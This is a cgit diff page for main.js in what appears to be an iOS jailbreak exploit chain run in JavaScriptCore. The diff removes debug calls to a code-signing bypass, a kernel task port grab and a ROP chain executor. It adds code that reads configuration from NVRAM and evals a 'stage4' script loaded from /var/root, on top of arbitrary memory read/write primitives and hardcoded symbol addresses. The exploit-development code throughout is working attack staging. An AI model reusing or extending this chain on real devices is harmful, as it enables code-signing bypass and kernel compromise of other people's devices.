summaryrefslogtreecommitdiff
path: root/src/js/main.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/main.js')
-rw-r--r--src/js/main.js155
1 files changed, 56 insertions, 99 deletions
diff --git a/src/js/main.js b/src/js/main.js
index 0a1de50..e077fbe 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -22,23 +22,53 @@ var MAP_ANON = 0x1000;
var victim = {a: 13.37};
if (0) {
-/*
- * leftover shit from jsc_fun, used to be using `log`
- */
-try {
- puts("we out here in jsc");
-} catch (e) {
/*
- * we don't have puts. :(
+ * leftover shit from jsc_fun, used to be using `log`
*/
-
- puts = function (){};
+ try {
+ puts("we out here in jsc");
+ } catch (e) {
+ /*
+ * we don't have puts. :(
+ */
+
+ puts = function (){};
}
}
var JSStringCreateWithUTF8CString = 0x239f9d0d;
var JSObjectGetProperty = 0x239fa411;
var JSContextGetGlobalObject = 0x239f8dfd;
+var bootstrap_port = 0x10b;
+var kCFBooleanTrue;
+var kCFBooleanFalse;
+var kCFPreferencesAnyUser;
+var kCFPreferencesCurrentHost;
+var kIOMasterPortDefault = NULL;
+var options = {};
+
+function parse_nvram_options() {
+// read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault"));
+ var kIOMasterPortDefault_ptr = shit_heap(4)
+ IOMasterPort(bootstrap_port, kIOMasterPortDefault_ptr);
+ kIOMasterPortDefault = read_u32(kIOMasterPortDefault_ptr);
+ var registry_entry = IORegistryEntryFromPath(kIOMasterPortDefault, "IODeviceTree:/options");
+
+ if (registry_entry) {
+ var p0laris_options_size = shit_heap(4);
+ write_u32(p0laris_options_size, 0x4000);
+ var p0laris_options = malloc(read_u32(p0laris_options_size));
+
+ if (IORegistryEntryGetProperty(registry_entry, "p0laris_options", p0laris_options, p0laris_options_size) == KERN_SUCCESS) {
+ var p0laris_options_buf = read_buf(p0laris_options, read_u32(p0laris_options_size));
+ var p0laris_options_js_str = "";
+ for (var i = 0; i < p0laris_options_buf.length; i++) {
+ p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]);
+ }
+ options = JSON.parse(p0laris_options_js_str);
+ }
+ }
+}
function main() {
/*
@@ -56,16 +86,12 @@ function main() {
init_sptr_heap();
- scall("printf", "%x %x %x %x\n", 0x41, 0x42, 0x43, 0x44);
+ syslog(LOG_SYSLOG, "we out here");
+ syslog(LOG_SYSLOG, "stage3");
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
- printf("slide=0x%x\n", slide);
- printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
- printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
- printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
-
var dyld_shc_slide = get_dyld_shc_slide();
sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
@@ -74,99 +100,30 @@ function main() {
prep_shit();
- large_buf[0] = 0x41424344;
- printf("%x\n", read_u32(large_buf_ptr));
-
setup_fancy_rw();
- csbypass();
-
- return;
-
-
- printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
+ parse_nvram_options();
-//return;
- var tfp0 = get_kernel_task();
-
- printf("tfp0=%x\n", tfp0);
-
- return;
-
- printf("dead?\n");
- var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
- printf("dead? %x\n", string_ref);
- var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
- printf("dead? %x\n", global_object);
- var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
- printf("dead?\n");
-
- printf("%x\n", jsobj_addr);
-// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
- victim.target = parent;
- printf("%x\n", read_u32(jsobj_addr + 0x18));
-// printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
-// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
-
- /*
- UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL"
- message:@"Dee dee doo doo."
- delegate:self
- cancelButtonTitle:@"OK"
- otherButtonTitles:nil];
- [alert show];
- */
-
- return;
-
- var rop_buf = new Array();
- var nop = (0x781a | 1) + slid;
- var zero_arr = [].slice.call(u32_to_u8x4(0));
- var nop_arr = [].slice.call(u32_to_u8x4(nop));
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(nop);
- for (var i = 0; i < 0x40000; i++) {
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(nop);
- if (i % 0x1000 == 0) {
- printf("%x\n", i);
+ if (options["sleep_spin"] === true) {
+ while (1) {
+ sleep(3600);
}
}
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0x41414141);
- printf("gen'd buf\n");
+ var stage4_bin = malloc(0x400000);
-// printf("%s\n", rop_buf[0].toString(16));
-
- printf("exec'ing\n");
- exec_rop(rop_buf);
- printf("done\n");
+ var fd = open("/var/root/stage4.js", O_RDONLY, 0);
+ var bytes_read = read(fd, stage4_bin, 0x400000);
+ var stage4_bin_buf = read_buf(stage4_bin, bytes_read);
+ var stage4_js_str = "";
+ for (var i = 0; i < stage4_bin_buf.length; i++) {
+ stage4_js_str += String.fromCharCode(stage4_bin_buf[i]);
+ }
-// var tfp0 = get_kernel_task();
+ printf("stage4 time baby\n");
+ eval(stage4_js_str);
-// printf("tfp0=%x\n", tfp0);
+ exit(main());
return;
-
- var i = 0;
- while (true) {
- syslog(LOG_SYSLOG, "get rekt from jsc %d (slide=%x)\n", i, slide);
- sleep(0);
- i++;
- }
-
- printf("still alive\n");
};
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:50:54 +0000